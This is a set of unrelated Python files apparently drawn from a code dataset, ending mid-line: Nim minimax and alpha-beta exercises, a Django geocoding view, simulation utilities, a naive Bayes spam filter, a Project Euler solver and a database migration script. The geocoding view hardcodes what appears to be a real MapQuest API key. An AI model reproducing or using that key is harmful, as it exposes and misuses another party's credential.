## ==================================================================\n## NIM\n## ==================================================================\n\n## Recall the game of Nim seen in class. Initially there is a pile of\n## N chips. On each move, the player has to take 1, 2 or 3 chips. The\n## player who takes the last piece loses.\n \n## ==================================================================\n## Exercise 2\n## ==================================================================\n\n## Define a function nim(n) that, receiving a natural number n as\n## input, returns the instance of the class Juego corresponding to\n## the game of Nim that starts the match with n pieces on the table.\n\n## Use the following static evaluation function: if the remainder of\n## dividing the number of pieces of the state by 4 equals 1 then, if\n## it is 'MAX''s turn return -1 and if it is 'MIN''s turn, return 1.\n## If the remainder of dividing the number of pieces of the state by\n## 4 is different from 1 then, if it is 'MAX''s turn return 1 and if\n## it is 'MIN''s turn, return -1.\n\n## >>> juego_nim = nim(17)\n## >>> juego_nim.estado_inicial\n## 17\n## >>> juego_nim.es_estado_final(3)\n## False\n## >>> juego_nim.movimientos(2)\n## [2, 1]\n## >>> juego_nim.movimientos(17)\n## [3, 2, 1]\n## >>> juego_nim.aplica(3, 17)\n## 14\n\n#def nim(n):\n#    estado_inicial = n\n\nclass Nim(juego):  # juego is the parent class\n\n    def __init__(self, n):\n        super().__init__(n, 0, 1, -1)\n        self.movimientos_posibles = [1,2,3] \n\n    def es_estado_ganador(self, estado, turno, jugador):\n        return turno == jugador\n\n    def movimientos(self, estado):\n        return [m for m in self.movimientos_posibles if m<=estado]  # [m | m<-[movimientos_posibles],m<=estado] in Haskell\n\n    def aplica(self, mov, estado):\n        return estado-mov\n\n    def str_movimiento(self, mov):\n        return \"Quitar {}\".format(mov)\n\n    def f_evaluacion(self, estado, turno):  # always from MAX's point of view\n        if estado%4 == 1:\n            if turno == \"MAX\":\n                return self.minimo_valor\n            else:\n                return self.maximo_valor\n        else:\n            if turno == \"MAX\":\n                return self.maximo_valor\n            else:\n                return self.minimo_valor\n    \n    \ndef nim(n):\n    return Nim(n)\n\n\n
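## Added sanity check (not in the original handout); the values follow\n## the evaluation function of Exercise 2:\n##\n## >>> nim(5).f_evaluacion(5, 'MAX')   # 5 % 4 == 1: the player to move loses\n## -1\n## >>> nim(6).f_evaluacion(6, 'MAX')\n## 1\n\n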
## ===================================================================\n## The minimax decision algorithm\n## ===================================================================\n\n## In this part we implement the minimax decision-making algorithm.\n\n## ==================================================================\n## Exercise 3\n## ==================================================================\n\n## Implement the minimax decision procedure seen in class. To do so,\n## define the following functions:\n\n## - minimax: given a game, a state of the game and a depth value,\n##   returns the move (applicable to that state in which 'MAX' has to\n##   play, with the best minimax value among all the available\n##   options) and the state that results from applying that move.\n\n## - valor_minimax: given a game, a state of the game, the player\n##   whose turn it is and a depth value, returns the minimax value,\n##   obtained as the value of the static evaluation function if the\n##   depth bound has been reached, the state is final or there are no\n##   moves applicable to the state; or the best of the minimax values\n##   of the successor states (the maximum if 'MAX' plays or the\n##   minimum if 'MIN' plays).\n\n## - maximizador: given a game, a state, a list of moves applicable to\n##   that state (successors) and a depth value, returns the maximum of\n##   the minimax values of the states obtained by applying each of the\n##   moves to the given state.\n\n## - minimizador: given a game, a state, a list of moves applicable to\n##   that state (successors) and a depth value, returns the minimum of\n##   the minimax values of the states obtained by applying each of the\n##   moves to the given state.\n\n## ##################################################################\n\n## (The Spanish prompts below are the literal output of the control()\n## helper from the juego module and are kept verbatim.)\n\n## >>> from juego import *\n## >>> control(juego_nim, 'MAX', [minimax, 5])\n## Estado : 17\n## Jugador : MAX\n## Mi turno.\n## Estado : 16\n## Jugador : MIN\n## Los movimientos permitidos son:\n##      Quitar 3 (0)\n##      Quitar 2 (1)\n##      Quitar 1 (2)\n## Tu turno: 0\n## Estado : 13\n## Jugador : MAX\n## Mi turno.\n## Estado : 12\n## Jugador : MIN\n## Los movimientos permitidos son:\n##      Quitar 3 (0)\n##      Quitar 2 (1)\n##      Quitar 1 (2)\n## Tu turno: 0\n## Estado : 9\n## Jugador : MAX\n## Mi turno.\n## Estado : 8\n## Jugador : MIN\n## Los movimientos permitidos son:\n##      Quitar 3 (0)\n##      Quitar 2 (1)\n##      Quitar 1 (2)\n## Tu turno: 0\n## Estado : 5\n## Jugador : MAX\n## Mi turno.\n## Estado : 4\n## Jugador : MIN\n## Los movimientos permitidos son:\n##      Quitar 3 (0)\n##      Quitar 2 (1)\n##      Quitar 1 (2)\n## Tu turno: 0\n## Estado : 1\n## Jugador : MAX\n## Mi turno.\n## Estado : 0\n## Jugador : MIN\n## El humano ha ganado\n\ndef minimax(juego, estado, cota):\n    max_val = -float(\"inf\")\n    movimiento_elegido = None\n    nuevo_estado = None\n\n    for m in juego.movimientos(estado):\n        sucesor = juego.aplica(m,estado)\n        valor_sucesor = valor_minimax(juego, sucesor, \"MIN\", cota-1)\n        if max_val < valor_sucesor:\n            max_val = valor_sucesor\n            movimiento_elegido = m\n            nuevo_estado = sucesor\n    return (movimiento_elegido,nuevo_estado)\n\n\ndef valor_minimax(juego, estado, turno, cota):\n    if(cota==0 or juego.es_estado_final(estado)):\n        return juego.f_evaluacion(estado, turno)\n    else:\n        movs = juego.movimientos(estado)\n        if turno == \"MAX\":\n            return maximizador(juego, estado, movs, cota-1)\n        else:\n            return minimizador(juego, estado, movs, cota-1)\n\n\ndef maximizador(juego, estado, movs, cota):\n    max_val = -float(\"inf\")\n    for m in movs:\n        sucesor = juego.aplica(m,estado)\n        valor_sucesor = valor_minimax(juego, sucesor, \"MIN\", cota)\n        if max_val < valor_sucesor:\n            max_val = valor_sucesor\n    return max_val\n\n
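# Added note: minimizador mirrors maximizador with the roles of the\n# players swapped; together with valor_minimax the pair consumes one\n# unit of the depth bound per ply.\n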
def minimizador(juego, estado, movs, cota):\n    min_val = float(\"inf\")\n    for m in movs:\n        sucesor = juego.aplica(m,estado)\n        valor_sucesor = valor_minimax(juego, sucesor, \"MAX\", cota)\n        if min_val > valor_sucesor:\n            min_val = valor_sucesor\n    return min_val\n\n\n    \n## ------------------------------------------------------------------\n## Exercise 4\n## ------------------------------------------------------------------\n\n## Implement the minimax decision-making algorithm with alpha-beta\n## pruning.\n\n## - alfa_beta: given a game, a state of the game and a depth bound,\n##   returns the move of the game applicable to that state (and the\n##   state that results from applying it) with which 'MAX' has to\n##   play. The move with the best minimax value among all the\n##   available options.\n\ndef alfa_beta(juego, estado, cota):\n    alfa = -float(\"inf\")\n    beta = juego.maximo_valor\n    movimiento_elegido = None\n    nuevo_estado = None\n\n    for m in juego.movimientos(estado):\n        sucesor = juego.aplica(m,estado)\n        valor_sucesor = valor_alfabeta(juego, sucesor, \"MIN\", cota-1, alfa, beta)\n        if alfa < valor_sucesor:\n            alfa = valor_sucesor\n            movimiento_elegido = m\n            nuevo_estado = sucesor\n        if alfa >= beta:\n            break\n    return (movimiento_elegido,nuevo_estado)\n\ndef valor_alfabeta(juego, estado, turno, cota, alfa, beta):\n    if(cota==0 or juego.es_estado_final(estado)):\n        return juego.f_evaluacion(estado, turno)\n    else:\n        movs = juego.movimientos(estado)\n        if turno == \"MAX\":\n            return maximizador_alfabeta(juego, estado, movs, cota-1, alfa, beta)\n        else:\n            return minimizador_alfabeta(juego, estado, movs, cota-1, alfa, beta)\n\ndef maximizador_alfabeta(juego, estado, movs, cota, alfa, beta):\n    for m in movs:\n        sucesor = juego.aplica(m,estado)\n        valor_sucesor = valor_alfabeta(juego, sucesor, \"MIN\", cota, alfa, beta)\n        if alfa < valor_sucesor:\n            alfa = valor_sucesor\n        if alfa >= beta:\n            break\n    return alfa\n\ndef minimizador_alfabeta(juego, estado, movs, cota, alfa, beta):\n    for m in movs:\n        sucesor = juego.aplica(m,estado)\n        valor_sucesor = valor_alfabeta(juego, sucesor, \"MAX\", cota, alfa, beta)\n        if beta > valor_sucesor:\n            beta = valor_sucesor\n        if alfa >= beta:\n            break\n    return beta","sub_path":"practica-02.py","file_name":"practica-02.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2236759","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.conf import settings\n\nimport pandas as pd\nimport requests\nimport json, os\nimport csv\n\n\n\n\ndef upload_excel(request):\n    \"\"\"\n    Returns an Excel file with co-ordinates \n    provided by the user in a csv file.\n    \"\"\"\n    if request.method == 'GET':\n        return render(request, 'locationapi/upload_excel.html')\n    else:\n        # File received and processed using a pandas dataframe\n        try:\n            excel_file = request.FILES[\"excel_file\"]\n            excel_data = pd.read_csv(excel_file)\n            for val in excel_data['address']:\n                url = f\"http://www.mapquestapi.com/geocoding/v1/address?key={'9BQLAZrmm65boiXlfL0IDHmZWyW1aAKh'}&location={val}\"\n                output = requests.get(url)\n                json_output = output.json()\n                loc = json_output['results'][0]['providedLocation']['location']\n                lat = json_output['results'][0]['locations'][0]['latLng']['lat']\n                lng = json_output['results'][0]['locations'][0]['latLng']['lng'] \n                excel_data.loc[excel_data.address == loc, ['latitude', 'longitude']] = lat, lng\n\n            # Response file sent to the user\n            response = HttpResponse(content_type='application/vnd.ms-excel')\n            response['Content-Disposition'] = 'attachment; filename=output.csv'\n            writer = csv.writer(response)\n            writer.writerow(['no', 'address', 'latitude', 'longitude'])\n\n            for row in 
excel_data.itertuples():\n writer.writerow(list(row))\n return response\n\n except Exception as e:\n return HttpResponse(\"Please check the file uploaded, instructions/rules are provided on upload page.\")\n","sub_path":"locationapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"455586306","text":"from django import template\n\nregister = template.Library()\n\n@register.inclusion_tag('manage/partials/_module_list_tag_template.html', takes_context=True)\ndef list_my_modules(context):\n '''\n displays the modules created by the current user\n\n :param context: the context of the current page\n :return: templated listing of all modules created by the user specified in view context\n '''\n my_modules = context['user'].created_modules.all().order_by('-updated_at')\n return {\n 'my_modules': my_modules,\n }\n\n# not sure how to handle this yet...\n#@register.inclusion_tag('manage/forms/module_form.html')\n# def display_module_form(module):\n# module_form = module\n# return {\n# module_form:\n# }","sub_path":"src/apps/manage/templatetags/manage_template_tags.py","file_name":"manage_template_tags.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"535503621","text":"import numpy as np\nimport sys\nsys.path.insert(0, \"./bounce-viz/src/\")\nfrom simple_polygon import Simple_Polygon\nfrom random import uniform\nfrom helper.shoot_ray_helper import IsInPoly, ClosestPtAlongRay\n\nEPSILON = 0.000000001\n\n# Geometric Operations\n# --------------------\n\n# http://mathworld.wolfram.com/Point-LineDistance2-Dimensional.html\ndef closest_edge(pt, poly):\n [x0,y0] = pt\n vs = poly.vertex_list_per_poly\n n = poly.size\n components = len(vs)\n min_d = 100000000000\n closest_component = -1\n closest_edge = -1\n # find closest edge over external boundary and holes\n for (i, component) in enumerate(vs):\n m = len(component)\n for j in range(m):\n [x1, y1], [x2,y2] = component[j][1], component[(j+1) % m][1]\n d = abs((x2-x1)*(y1-y0) - (x1-x0)*(y2-y1)) / np.sqrt((x2-x1)**2 + (y2-y1)**2)\n if d < min_d:\n min_d = d\n closest_component = i\n closest_edge = j\n return min_d, closest_component, closest_edge\n\ndef dist_dir_closest_edge(pt, poly):\n d, c, j = closest_edge(pt, poly)\n vs = poly.vertex_list_per_poly\n csize = len(vs[c])\n edge_vect = vs[c][(j + 1) % csize][1] - vs[c][j][1]\n return d, edge_vect\n\ndef normalize(vector):\n norm = np.linalg.norm(vector)\n if norm > EPSILON:\n return vector/norm\n else:\n return 0.0*vector\n\ndef rotate_vector(v, theta):\n vx, vy = v[0], v[1]\n return np.array( [np.cos(theta)*vx - np.sin(theta)*vy,\n np.sin(theta)*vx + np.cos(theta)*vy])\n\ndef midpoint(pt1, pt2):\n return (pt1+pt2)/2\n\n\n# Collision Utilities\n# -------------------\n\n\n# elastic scattering\ndef twoCollide(particle1, particle2):\n v1, v2 = particle1.velocity, particle2.velocity\n v1x, v1y = v1\n v2x, v2y = v2\n m1, m2 = particle1.mass, particle2.mass\n p1, p2 = particle1.position, particle2.position\n x1x, x1y = p1\n x2x, x2y = p2\n v1prime = v1 - (2 * m2) / (m1 + m2) * (np.dot(v1-v2,p1-p2)) / ((x1x - x2x)**2 + (x1y - x2y)**2) * (p1 - p2)\n v2prime = v2 - (2 * m1) / (m1 + m2) * (np.dot(v2-v1,p2-p1)) / ((x2x - x1x)**2 + (x2y - x1y)**2) * (p2 - p1)\n particle1.velocity = v1prime\n particle2.velocity = v2prime\n\ndef softRepulse(particle1, particle2, K):\n v1, v2 = particle1.velocity, 
particle2.velocity\n v1x, v1y = v1\n v2x, v2y = v2\n m1, m2 = particle1.mass, particle2.mass\n p1, p2 = np.array(particle1.position), np.array(particle2.position)\n r1, r2 = particle1.radius, particle2.radius\n # vector from p1 to p2\n r12 = normalize(p2-p1)\n # vector from p2 to p1\n r21 = normalize(p1-p2)\n\n # magnitude of repulsive force proportional to distance\n rlen = np.linalg.norm(p1-p2)\n if rlen < r1+r2:\n f = K*(r1 + r2 - rlen)\n else:\n f = 0\n\n # force on particle 1\n # TODO: fix to incorporate direction of heading\n f1 = f*r21\n # force on particle 2\n f2 = f*r12\n\n particle1.velocity += f1/m1\n particle2.velocity += f2/m2\n\n\n# Environment Utilities\n# -----------------\n\ndef mk_spiky_circle(n, r):\n d = 2*np.pi/n\n theta = 0\n pts = []\n for i in range(n):\n pt1 = [r*np.cos(theta), r*np.sin(theta)]\n r2 = 1.5*r\n pt2 = [r2*np.cos(theta), r2*np.sin(theta)]\n theta += d\n pts.extend([pt1, pt2])\n return pts\n\ndef mk_spiky_obstacle(n, r):\n d = 2*np.pi/n\n theta = 0.0\n pts = []\n for i in range(n):\n pt1 = [r*np.cos(theta), r*np.sin(theta)]\n r2 = 0.6*r\n th2 = theta + 0.3*d\n pt2 = [r2*np.cos(th2), r2*np.sin(th2)]\n theta += d\n pts.extend([pt1, pt2])\n return pts[::-1]\n\ndef mk_regpoly(n, r, offset=0.0):\n d = 2*np.pi/n\n theta = offset\n pts = []\n for i in range(n):\n pt = [r*np.cos(theta), r*np.sin(theta)]\n theta += d\n pts.append(pt)\n return pts\n\ndef mk_obstacle(vertices):\n return vertices[::-1]\n\ndef mk_bounding_box(poly):\n vs = poly.vertex_list_per_poly[0]\n xs = np.sort([v[0] for i, v in vs])\n ys = np.sort([v[1] for i, v in vs])\n min_x = xs[0]\n max_x = xs[-1]\n min_y = ys[0]\n max_y = ys[-1]\n bb_verts = np.array([(min_x, min_y), (max_x, min_y), (max_x, max_y), (min_x, max_y)])\n bb = Simple_Polygon(\"bb\"+poly.name, bb_verts)\n return min_x, max_x, min_y, max_y, bb\n\ndef uniform_sample_from_poly(poly, n):\n min_x, max_x, min_y, max_y, bb = mk_bounding_box(poly)\n samples = [[0,0]]*n\n for i in range(n):\n sample = [uniform(min_x, max_x), uniform(min_y, max_y)]\n while not IsInPoly(sample, poly):\n sample = uniform(min_x, max_x), uniform(min_y, max_y)\n samples[i] = sample\n return samples\n\ndef uniform_sample_along_circle(poly, n, r):\n samples = [[0,0]]*n\n for i in range(n):\n sample = r*normalize([uniform(-1., 1.), uniform(-1.,1.)])\n while not IsInPoly(sample, poly):\n sample = r*normalize([uniform(-1., 1.), uniform(-1.,1.)])\n samples[i] = sample\n return samples\n\n\n\n# Magnetic flow field generation\n# all the ugly packing/unpacking is to make matplotlib stuff work\n# ------------------------------\n\nclass Wire():\n def __init__(self, xy, dir):\n self.xy = xy\n self.dir = dir\n\n def force_at(self, x, y):\n xself, yself = self.xy\n normal = np.array([x-xself, y-yself])\n # current flowing through wire creates mag field that drops off as 1/r\n field_strength = np.true_divide(1.0, np.linalg.norm(normal, axis=0))\n field = []\n if self.dir == \"CW\":\n field = field_strength*normalize(rotate_vector(normal, 3.*np.pi/2.))\n elif self.dir == \"CCW\":\n field = field_strength*normalize(rotate_vector(normal, np.pi/2.))\n else:\n field = np.array([0.*x, 0.*y])\n return field[0], field[1]\n\n# magnetic fields follow superposition principle\ndef force_from_wires(wires, xy):\n x, y = xy\n force = np.array([0.0, 0.0])\n for w in wires:\n fx, fy = w.force_at(x, y)\n force += np.array([fx, fy])\n return force\n\n# running policies\n# ----------------\n\n# hardcoded: four wires, each wire is either CW, CCW, or X\n# let wires be arranged as:\n # 0 1\n # 2 
3\n# let CW := 0\n# CCW := 1\n# X := 2\n#\n# encode with base-3 number system\n\nwire_to_state = {\"CW\":0, \"CCW\":1, \"X\":2}\nstate_to_wire = {0:\"CW\", 1:\"CCW\", 2:\"X\"}\n\ndef encode_policy(wires):\n    [w0, w1, w2, w3] = wires # TODO use pycontracts\n    policy = 0\n    for i,w in enumerate(wires):\n        policy += wire_to_state[w]*(3**i)\n    return policy\n\ndef decode_policy(policy):\n    states = [\"\", \"\", \"\", \"\"]\n    for i in range(4):\n        mod_policy = policy % 3\n        states[i] = mod_policy\n        policy = policy // 3\n    str_states = [state_to_wire[s] for s in states]\n    return str_states\n\ndef encodeJointState(states):\n    X = 5 # five options for state\n    joint_state = 0\n    N = len(states)-1\n    for s in states:\n        joint_state += s*(X**N)\n        N = N - 1\n    return joint_state\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"379629255","text":"import os\nimport re\nfrom setuptools import setup, find_packages\n\n\ndef get_file(*parts):\n    filename = os.path.join(os.path.dirname(__file__), *parts)\n    return open(filename)\n\n\ndef find_version(*file_paths):\n    f = get_file(*file_paths)\n    for line in f:\n        if re.match('__version__ = .+', line):\n            return re.search('\\\\d.+\\\\d', line).group(0)\n    raise RuntimeError('Unable to find string version')\n\n\nREADME = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n    name='teracy-html5boilerplate',\n    version=find_version('teracy', 'html5boilerplate', '__init__.py'),\n    packages=find_packages(),\n    namespace_packages=['teracy'],\n    include_package_data=True,\n    license='BSD License',\n    description='html5-boilerplate Django wrapper application',\n    long_description=README,\n    url='http://www.teracy.org/projects/teracy-html5boilerplate',\n    author='hoatle',\n    author_email='hoatlevan@gmail.com',\n    classifiers=[\n        'Environment :: Web Environment',\n        'Framework :: Django',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: BSD License',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 2.6',\n        'Programming Language :: Python :: 2.7',\n        'Topic :: Internet :: WWW/HTTP',\n        'Topic :: Internet :: WWW/HTTP :: html5-boilerplate',\n    ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644611075","text":"import random\n\nimport numpy as np\nimport re\n\n\ndef load_dataset():\n    \"\"\"\n    Create some toy experiment samples.\n    The first return value is the tokenized posts, the second whether each post is abusive.\n    \"\"\"\n\n    posting_list = [\n        ['my','dog','has','flea',\n         'problems','help','please'],\n        ['maybe','not','take','him',\n         'to','dog','park','stupid'],\n        ['my','dalmation','is','so','cute',\n         'I','love','him'],\n        ['stop','posting','stupid','worthless','garbage'],\n        ['mr','licks','ate','my','steak','how',\n         'to','stop','him'],\n        ['quit','buying','worthless','dog','food','stupid']\n    ]\n    class_vec = [0,1,0,1,0,1] # 1 = abusive, 0 = normal\n    return posting_list,class_vec\n\ndef create_vocab_list(dataset):\n    # create an empty set to hold every word\n    vocab_set = set([])\n    for document in dataset:\n        # union of the two sets, the | operator\n        vocab_set = vocab_set | set(document)\n    return list(vocab_set)\n\n
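# Added usage sketch: create_vocab_list([['my','dog'], ['my','cat']])\n# returns the three words 'my', 'dog', 'cat' in some set-dependent order.\n\n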
def set_of_words2vec(vocab_list,input_set):\n    \"\"\"Set-of-words model: a word is recorded as 1 no matter how many times it appears.\"\"\"\n    # initialize a zero vector as long as the vocabulary\n    return_vec = [0]*len(vocab_list)\n    # for each word in the input set\n    for word in input_set:\n        # if the word exists in the vocabulary\n        if word in vocab_list:\n            # set its flag to 1\n            return_vec[vocab_list.index(word)] = 1\n        else:\n            print('the word: %s is not in my vocabulary!' % word)\n    return return_vec\n\ndef bag_of_words2vec(vocab_list,input_set):\n    \"\"\"Naive Bayes bag-of-words model.\"\"\"\n    return_vec = [0]*len(vocab_list)\n    for word in input_set:\n        if word in vocab_list:\n            # here we add 1 (a count, not just a flag)\n            return_vec[vocab_list.index(word)] += 1\n    return return_vec\n\ndef train_nb0(train_matrix,train_category):\n    \"\"\"p1 refers to abusive documents. Each time a word appears in an abusive (or normal)\n    document, the matching entry of p1_num (or p0_num) is incremented, and the document's\n    total word count is added to the matching denominator.\"\"\"\n    num_train_docs = len(train_matrix)\n    num_words = len(train_matrix[0])\n    p_abusive = np.sum(train_category)/float(num_train_docs)\n    # p0_num = np.zeros(num_words)\n    # p1_num = np.zeros(num_words)\n    # # these would be the denominators\n    # p0_denom = 0.\n    # p1_denom = 0.\n    # The zero initialization above can make a product of probabilities zero (see p. 65),\n    # so Laplace-style smoothing is used instead:\n    p0_num = np.ones(num_words)\n    p1_num = np.ones(num_words)\n    p0_denom = 2.\n    p1_denom = 2.\n    for i in range(num_train_docs):\n        # if the document is abusive\n        if train_category[i] == 1:\n            # vector addition: accumulate every word that appears in abusive documents\n            p1_num += train_matrix[i]\n            p1_denom += np.sum(train_matrix[i])\n        else:\n            p0_num += train_matrix[i]\n            p0_denom += np.sum(train_matrix[i])\n    # p1_vect = p1_num/p1_denom # changed to log(): multiplying many tiny numbers underflows, logs do not\n    # p0_vect = p0_num/p0_denom # changed to log()\n    p1_vect = np.log(p1_num / p1_denom)\n    p0_vect = np.log(p0_num / p0_denom)\n    # return the two log-probability vectors and the prior probability of an abusive document\n    return p0_vect,p1_vect,p_abusive\n\ndef classify_nb(vec2classify,p0vec,p1vec,pclass1):\n    # inputs: the vector to classify and the three probabilities computed by train_nb0\n    p1 = np.sum(vec2classify*p1vec) + np.log(pclass1)\n    p0 = np.sum(vec2classify*p0vec) + np.log(1.0 - pclass1)\n    # return the classification result\n    if p1 > p0:\n        return 1\n    else:\n        return 0\n\n
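# Added note: because the vectors hold log-probabilities, the sums above\n# compute log P(c) + sum_i n_i * log P(w_i | c), i.e. the log of the naive\n# Bayes numerator; comparing p1 and p0 in log space avoids the underflow\n# of multiplying many small probabilities.\n\n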
def testing_nb():\n    # load the data\n    list_of_posts,list_classes = load_dataset()\n    # build the unique vocabulary\n    my_vocab_list = create_vocab_list(list_of_posts)\n    # fill the train_mat list with word vectors\n    train_mat = []\n    # turn every post into a vector and push it into the mat\n    for post_in_doc in list_of_posts:\n        train_mat.append(set_of_words2vec(my_vocab_list,post_in_doc))\n    # train on the vectorized posts and their class labels\n    p0v,p1v,pab = train_nb0(np.array(train_mat),np.array(list_classes))\n    # run the tests\n    test_entry = ['love','my','dalmation']\n    this_doc = np.array(set_of_words2vec(my_vocab_list,test_entry))\n    print(test_entry,'classified as: ',classify_nb(this_doc,p0v,p1v,pab))\n    test_entry = ['stupid','garbage']\n    this_doc = np.array(set_of_words2vec(my_vocab_list, test_entry))\n    print(test_entry, 'classified as: ', classify_nb(this_doc, p0v, p1v, pab))\n\ndef split_text_test():\n    my_sent = 'This book is the find_best book on Python or M.L. I have ever laid eyes upon.'\n    # naive split(); plenty of punctuation is left attached\n    print(my_sent.split())\n    # an extra backslash was probably typed here; the idea is to split the data on non-letter characters\n    rtext = re.compile('\\\\\\\\W*')\n    list_of_tokens = rtext.split(my_sent)\n    print(list_of_tokens)\n    t = [tok.lower() for tok in list_of_tokens if len(tok) > 0]\n    email_text = open('email/ham/6.txt').read()\n    list_of_tokens = rtext.split(email_text)\n    print(list_of_tokens)\n\ndef text_parse(big_string):\n    # parse into a list of strings, drop strings of two characters or fewer, and lower-case the rest\n    # add any extra parsing you want right here\n    list_of_tokens = re.split(r'\\\\W*',big_string)\n    return [tok.lower() for tok in list_of_tokens if len(tok) > 2]\n\ndef spam_test():\n    doc_list = []\n    class_list = []\n    full_text = []\n    # going up to 26 raises an error\n    for i in range(1,23):\n        # read the whole file and parse it into a token list\n        word_list = text_parse(open('email/spam/%d.txt' % i ).read())\n        # put the token list into doc_list\n        doc_list.append(word_list) # a list of lists\n        full_text.extend(word_list) # just one flat list\n        class_list.append(1) # these are the spam emails\n        # same as above\n        word_list = text_parse(open('email/ham/%d.txt' % i).read())\n        doc_list.append(word_list)\n        full_text.extend(word_list)\n        class_list.append(0) # these are the ham emails\n    # collect one copy of every word\n    vocab_list = create_vocab_list(doc_list)\n    # training_set = list(range(50)) would error: only 44 documents are loaded above\n    # a list of the indices 0 to 39\n    training_set = list(range(40))\n    # test set\n    test_set = []\n    for i in range(10):\n        # randomly split a test set off the training set\n        # (the remainder could also be used for cross-validation)\n        # admittedly a very casual way to randomize\n        rand_index = int(random.uniform(0,len(training_set)))\n        # these samples go into the test set\n        test_set.append((training_set[rand_index]))\n        # and are removed from the training set\n        del(training_set[rand_index])\n    train_mat = []\n    train_classes = []\n    for doc_index in training_set:\n        # turn each doc into a 0/1 vector and append it to train_mat\n        train_mat.append((set_of_words2vec(vocab_list,doc_list[doc_index])))\n        # remember the matching class label\n        train_classes.append((class_list[doc_index]))\n    # compute the probabilities\n    p0v,p1v,pspam = train_nb0(np.array(train_mat),np.array(train_classes))\n    error_count = 0\n    for doc_index in test_set:\n        word_vec = set_of_words2vec(vocab_list,doc_list[doc_index])\n        # test the classification; on a mistake, add 1\n        # the probabilities above exist exactly for this step\n        if classify_nb(np.array(word_vec),p0v,p1v,pspam ) != class_list[doc_index]:\n            error_count += 1\n    print('the error rate is: ',float(error_count)/len(test_set))\n\nif __name__ == '__main__':\n    # list_classes holds the abusive-or-not label of each post\n    # list_of_posts holds the simple tokenized posts\n    # list_of_posts,list_classes = load_dataset()\n    # # extract the unique vocabulary\n    # my_vocab_list = create_vocab_list(list_of_posts)\n    # print(my_vocab_list)\n    # # turn one post into a 1 0 1 0 style vector\n    # a = set_of_words2vec(my_vocab_list,list_of_posts[0])\n    # # fill the train_mat list with word vectors\n    # train_mat = []\n    # # turn every post into a vector and push it into the mat\n    # for post_in_doc in list_of_posts:\n    #     train_mat.append((set_of_words2vec(my_vocab_list,post_in_doc)))\n    # # train on the vectorized posts via their class labels\n    # p0v,p1v,pab = train_nb0(train_mat,list_classes)\n    # print(p0v)\n    # # one entry is about 0.15789474, exactly at the index of 'stupid',\n    # # i.e. that word is strong evidence of an abusive post\n    # print(p1v)\n    # print(pab)\n    # ['love', 'my', 'dalmation'] classified as: 0\n    # ['stupid', 'garbage'] classified as: 1\n    # testing_nb()\n    # split_text_test()\n    spam_test()","sub_path":"naive_bayes/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"162165712","text":"'''\r\nProject Euler 206\r\n'''\r\n\r\nimport itertools, time\r\nstart = time.time()  # renamed from 's': the search loops below reuse 's' for candidate numbers, which corrupted the timing prints\r\n\r\ndef check(n):\r\n    s = str(n ** 2)\r\n    try:\r\n        # digit k of the pattern 1_2_3_4_5_6_7_8_9_0 sits at index 2*(k-1); the last digit is 0\r\n        if all(s[2*(i-1)] == str(i % 10) for i in range(1,11)):\r\n            return True\r\n        else:\r\n            return False\r\n    except:\r\n        return False\r\n\r\n
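# Added example of the suffix matcher below ('_' is a wildcard):\r\n# string_check(138, '_4') is True because 138**2 == 19044 ends in '44'.\r\n\r\n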
def string_check(n,code):\r\n    s = str(n ** 2)[-len(code):]\r\n    for index, value in enumerate(code):\r\n        if value != '_' and value != s[index]:\r\n            return False\r\n        else:\r\n            continue\r\n    return True\r\n\r\n\r\n# NOT END WITH 30, 70! Should check both\r\n\r\nposs_list = []\r\nfor p in itertools.product('0123456789', repeat=2):\r\n    s = int(p[0]+p[1]+'70')\r\n    if string_check(s,'8_9_0'):\r\n        poss_list.append(p)\r\n\r\n\r\nnext_poss_list = []\r\nfor p in itertools.product('0123456789', repeat=3):\r\n    for q in poss_list:\r\n        s = int(p[0]+p[1]+p[2]+q[0]+q[1]+'70')\r\n        if string_check(s,'7_8_9_0'):\r\n            next_poss_list.append((p,q))\r\n\r\nprint(time.time() - start)\r\n\r\nr = 0\r\nfor p in itertools.product('0123456789', repeat=2):\r\n    for q in next_poss_list:\r\n        s = int('1'+p[0]+p[1]+q[0][0]+q[0][1]+q[0][2]+q[1][0]+q[1][1]+'70')\r\n        if string_check(s,'1_2_3_4_5_6_7_8_9_0'):\r\n            print(s)\r\n            r = 1\r\n            break \r\n    if r != 0:\r\n        break\r\n\r\nprint(time.time() - start)\r\n\r\n\r\n    \r\n","sub_path":"old_solutions/projecteuler206.py","file_name":"projecteuler206.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"555161879","text":"from models import db, Stock, Stock_realtime, Admin, News, \\\n    DisclosureInfo, Recruitment, News_Post, Recruit_Post\nfrom dateutil.parser import parse\n\nimport csv\n\n\n# def db_create_tables(event, context):\n#     db.connect()\n#     db.drop_tables([Stock, Stock_realtime])\n#     db.create_tables([Stock, Stock_realtime, Admin, News, DisclosureInfo, Recruitment, News_Post, Recruit_Post])\n\ndef db_migrate(event, context):\n    with open('stock.csv', 'rt') as stock:\n        stock = stock.readlines()[1:]\n        csv_stock = csv.reader(stock)\n        # only the data rows, as csv\n        for row in csv_stock:\n            stock_object = Stock.create(each_date=parse(row[0]).date(), price=int(row[1]), 